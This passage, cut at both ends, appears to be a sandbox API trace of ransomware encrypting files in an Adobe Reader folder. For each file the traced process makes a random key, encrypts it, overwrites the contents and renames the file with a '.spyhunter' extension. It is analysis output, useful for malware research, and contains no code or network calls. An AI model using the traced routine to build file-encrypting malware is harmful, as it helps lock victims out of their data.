(x86)\\adobe\\reader 10.0\\reader\\reader_sl.exe.spyhunter")) returned 1 [0119.244] GetProcessHeap () returned 0x2c0000 [0119.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0119.244] GetProcessHeap () returned 0x2c0000 [0119.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0119.244] GetProcessHeap () returned 0x2c0000 [0119.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e02088 | out: hHeap=0x2c0000) returned 1 [0119.245] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf930 | out: pbBuffer=0x25cf930) returned 1 [0119.245] GetProcessHeap () returned 0x2c0000 [0119.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0119.245] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf928*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf928*=0x30) returned 1 [0119.245] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0119.247] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm") returned 58 [0119.247] StrStrW (lpFirst="ReadMeUKR.htm", lpSrch=".txt") returned 0x0 [0119.247] GetProcessHeap () returned 0x2c0000 [0119.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0119.247] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf8ec*=0x2800, lpOverlapped=0x0) returned 1 [0119.265] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.265] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf8ec*=0x2800, lpOverlapped=0x0) returned 1 [0119.265] GetProcessHeap () returned 0x2c0000 [0119.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0119.265] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.265] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf92c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8ec, lpOverlapped=0x0 | out: lpBuffer=0x25cf92c*, lpNumberOfBytesWritten=0x25cf8ec*=0x4, lpOverlapped=0x0) returned 1 [0119.279] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8ec*=0x30, lpOverlapped=0x0) returned 1 [0119.279] CloseHandle (hObject=0xf4) returned 1 [0119.279] GetProcessHeap () returned 0x2c0000 [0119.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0119.280] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm.spyhunter") returned 68 [0119.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm.spyhunter")) returned 1 [0119.281] GetProcessHeap () returned 0x2c0000 [0119.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0119.281] GetProcessHeap () returned 0x2c0000 [0119.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0119.281] GetProcessHeap () returned 0x2c0000 [0119.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f700 | out: hHeap=0x2c0000) returned 1 [0119.281] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf928 | out: pbBuffer=0x25cf928) returned 1 [0119.281] GetProcessHeap () returned 0x2c0000 [0119.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0119.281] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf920*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf920*=0x30) returned 1 [0119.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0119.286] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm") returned 58 [0119.286] StrStrW (lpFirst="ReadMePOL.htm", lpSrch=".txt") returned 0x0 [0119.286] GetProcessHeap () returned 0x2c0000 [0119.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0119.286] ReadFile (in: hFile=0xf4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf8e4*=0x2800, lpOverlapped=0x0) returned 1 [0119.467] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.467] WriteFile (in: hFile=0xf4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf8e4*=0x2800, lpOverlapped=0x0) returned 1 [0119.468] GetProcessHeap () returned 0x2c0000 [0119.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0119.468] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.468] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf924*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8e4, lpOverlapped=0x0 | out: lpBuffer=0x25cf924*, lpNumberOfBytesWritten=0x25cf8e4*=0x4, lpOverlapped=0x0) returned 1 [0119.686] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8e4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8e4*=0x30, lpOverlapped=0x0) returned 1 [0119.687] CloseHandle (hObject=0xf4) returned 1 [0119.701] GetProcessHeap () returned 0x2c0000 [0119.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.701] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm.spyhunter") returned 68 [0119.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm.spyhunter")) returned 1 [0119.702] GetProcessHeap () returned 0x2c0000 [0119.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.702] GetProcessHeap () returned 0x2c0000 [0119.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0119.702] GetProcessHeap () returned 0x2c0000 [0119.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f400 | out: hHeap=0x2c0000) returned 1 [0119.702] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf928 | out: pbBuffer=0x25cf928) returned 1 [0119.702] GetProcessHeap () returned 0x2c0000 [0119.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0119.702] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf920*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf920*=0x30) returned 1 [0119.702] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozGoPr6N-Medium.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozgopr6n-medium.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0119.703] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozGoPr6N-Medium.otf") returned 82 [0119.703] StrStrW (lpFirst="KozGoPr6N-Medium.otf", lpSrch=".txt") returned 0x0 [0119.703] GetProcessHeap () returned 0x2c0000 [0119.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0119.703] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf8e4*=0x2800, lpOverlapped=0x0) returned 1 [0119.901] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.901] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf8e4*=0x2800, lpOverlapped=0x0) returned 1 [0119.901] GetProcessHeap () returned 0x2c0000 [0119.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0119.901] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.901] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf924*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8e4, lpOverlapped=0x0 | out: lpBuffer=0x25cf924*, lpNumberOfBytesWritten=0x25cf8e4*=0x4, lpOverlapped=0x0) returned 1 [0119.904] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8e4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8e4*=0x30, lpOverlapped=0x0) returned 1 [0119.904] CloseHandle (hObject=0x16c) returned 1 [0119.970] GetProcessHeap () returned 0x2c0000 [0119.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2eb7be8 [0119.970] wnsprintfW (in: pszDest=0x2eb7be8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozGoPr6N-Medium.otf.spyhunter") returned 92 [0119.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozGoPr6N-Medium.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozgopr6n-medium.otf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozGoPr6N-Medium.otf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozgopr6n-medium.otf.spyhunter")) returned 1 [0119.971] GetProcessHeap () returned 0x2c0000 [0119.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7be8 | out: hHeap=0x2c0000) returned 1 [0119.971] GetProcessHeap () returned 0x2c0000 [0119.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0119.971] GetProcessHeap () returned 0x2c0000 [0119.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7418 | out: hHeap=0x2c0000) returned 1 [0119.971] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf920 | out: pbBuffer=0x25cf920) returned 1 [0119.971] GetProcessHeap () returned 0x2c0000 [0119.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0119.972] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf918*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf918*=0x30) returned 1 [0119.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\SY______.PFM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\sy______.pfm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0120.083] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\SY______.PFM") returned 75 [0120.083] StrStrW (lpFirst="SY______.PFM", lpSrch=".txt") returned 0x0 [0120.083] GetProcessHeap () returned 0x2c0000 [0120.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0120.083] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf8dc*=0x2a0, lpOverlapped=0x0) returned 1 [0120.084] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffd60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.084] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x25cf8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf8dc*=0x2a0, lpOverlapped=0x0) returned 1 [0120.084] GetProcessHeap () returned 0x2c0000 [0120.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0120.084] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.084] WriteFile (in: hFile=0xec, lpBuffer=0x25cf91c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8dc, lpOverlapped=0x0 | out: lpBuffer=0x25cf91c*, lpNumberOfBytesWritten=0x25cf8dc*=0x4, lpOverlapped=0x0) returned 1 [0120.084] WriteFile (in: hFile=0xec, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8dc*=0x30, lpOverlapped=0x0) returned 1 [0120.084] CloseHandle (hObject=0xec) returned 1 [0120.084] GetProcessHeap () returned 0x2c0000 [0120.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2eb7be8 [0120.084] wnsprintfW (in: pszDest=0x2eb7be8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\SY______.PFM.spyhunter") returned 85 [0120.085] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\SY______.PFM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\sy______.pfm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\SY______.PFM.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\sy______.pfm.spyhunter")) returned 1 [0120.085] GetProcessHeap () returned 0x2c0000 [0120.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7be8 | out: hHeap=0x2c0000) returned 1 [0120.085] GetProcessHeap () returned 0x2c0000 [0120.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0120.085] GetProcessHeap () returned 0x2c0000 [0120.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e63b00 | out: hHeap=0x2c0000) returned 1 [0120.085] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf920 | out: pbBuffer=0x25cf920) returned 1 [0120.085] GetProcessHeap () returned 0x2c0000 [0120.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0120.086] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf918*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf918*=0x30) returned 1 [0120.086] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-bold.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0120.089] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Bold.otf") returned 77 [0120.089] StrStrW (lpFirst="MyriadPro-Bold.otf", lpSrch=".txt") returned 0x0 [0120.089] GetProcessHeap () returned 0x2c0000 [0120.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0120.089] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf8dc*=0x2800, lpOverlapped=0x0) returned 1 [0120.135] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.135] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf8dc*=0x2800, lpOverlapped=0x0) returned 1 [0120.135] GetProcessHeap () returned 0x2c0000 [0120.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0120.135] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.135] WriteFile (in: hFile=0xec, lpBuffer=0x25cf91c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8dc, lpOverlapped=0x0 | out: lpBuffer=0x25cf91c*, lpNumberOfBytesWritten=0x25cf8dc*=0x4, lpOverlapped=0x0) returned 1 [0120.177] WriteFile (in: hFile=0xec, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8dc*=0x30, lpOverlapped=0x0) returned 1 [0120.177] CloseHandle (hObject=0xec) returned 1 [0120.194] GetProcessHeap () returned 0x2c0000 [0120.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ed7c78 [0120.194] wnsprintfW (in: pszDest=0x2ed7c78, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Bold.otf.spyhunter") returned 87 [0120.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-bold.otf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Bold.otf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-bold.otf.spyhunter")) returned 1 [0120.195] GetProcessHeap () returned 0x2c0000 [0120.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed7c78 | out: hHeap=0x2c0000) returned 1 [0120.195] GetProcessHeap () returned 0x2c0000 [0120.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0120.195] GetProcessHeap () returned 0x2c0000 [0120.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e73b28 | out: hHeap=0x2c0000) returned 1 [0120.195] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf918 | out: pbBuffer=0x25cf918) returned 1 [0120.195] GetProcessHeap () returned 0x2c0000 [0120.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0120.195] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf910*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf910*=0x30) returned 1 [0120.195] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0120.196] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt") returned 111 [0120.196] StrStrW (lpFirst="DisplayLanguageNames.zh_TW.txt", lpSrch=".txt") returned=".txt" [0120.196] lstrlenW (lpString=".txt") returned 4 [0120.196] lstrlenW (lpString=".txt") returned 4 [0120.196] GetProcessHeap () returned 0x2c0000 [0120.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0120.196] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf8d4*=0x2800, lpOverlapped=0x0) returned 1 [0120.224] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.225] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf8d4*=0x2800, lpOverlapped=0x0) returned 1 [0120.225] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf8d4*=0x2800, lpOverlapped=0x0) returned 1 [0120.232] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.232] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf8d4*=0x2800, lpOverlapped=0x0) returned 1 [0120.233] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf8d4*=0x105a, lpOverlapped=0x0) returned 1 [0120.241] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffefa6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.241] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x105a, lpNumberOfBytesWritten=0x25cf8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf8d4*=0x105a, lpOverlapped=0x0) returned 1 [0120.242] GetProcessHeap () returned 0x2c0000 [0120.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0120.242] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.242] WriteFile (in: hFile=0xec, lpBuffer=0x25cf914*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8d4, lpOverlapped=0x0 | out: lpBuffer=0x25cf914*, lpNumberOfBytesWritten=0x25cf8d4*=0x4, lpOverlapped=0x0) returned 1 [0120.242] WriteFile (in: hFile=0xec, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8d4*=0x30, lpOverlapped=0x0) returned 1 [0120.242] CloseHandle (hObject=0xec) returned 1 [0120.242] GetProcessHeap () returned 0x2c0000 [0120.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0120.243] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 